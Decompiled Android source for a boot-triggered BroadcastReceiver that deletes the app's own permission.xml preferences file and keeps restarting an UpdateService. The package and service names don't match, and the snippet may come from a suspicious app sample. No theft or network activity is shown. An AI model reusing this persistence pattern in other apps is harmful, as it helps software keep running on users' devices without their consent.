package com.safetest.shark;

import android.app.ActivityManager;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.content.pm.ApplicationInfo;
import java.io.File;
import java.util.ArrayList;
import java.util.List;
/* loaded from: classes.dex */
public final class Receiver extends BroadcastReceiver {
    private static final String SNAME = "com.safesys.remover.UpdateService";

    @Override // android.content.BroadcastReceiver
    public void onReceive(Context context, Intent intent) {
        ApplicationInfo ai;
        if (intent.getAction().equals("android.intent.action.BOOT_COMPLETED") && (ai = context.getApplicationInfo()) != null) {
            String path = "/data/data/" + ai.packageName + "/shared_prefs/permission.xml";
            File file = new File(path);
            if (file.exists()) {
                file.delete();
            }
        }
        List<String> services = getRuningServices(context);
        if (!services.contains(SNAME)) {
            Intent in = new Intent();
            in.setClass(context, UpdateService.class);
            context.startService(in);
        }
    }

    private List<String> getRuningServices(Context context) {
        ActivityManager activityManager = (ActivityManager) context.getSystemService("activity");
        List<ActivityManager.RunningServiceInfo> serivces = activityManager.getRunningServices(100);
        List<String> servicesName = new ArrayList<>();
        for (ActivityManager.RunningServiceInfo service : serivces) {
            servicesName.add(service.service.getShortClassName());
        }
        return servicesName;
    }
}
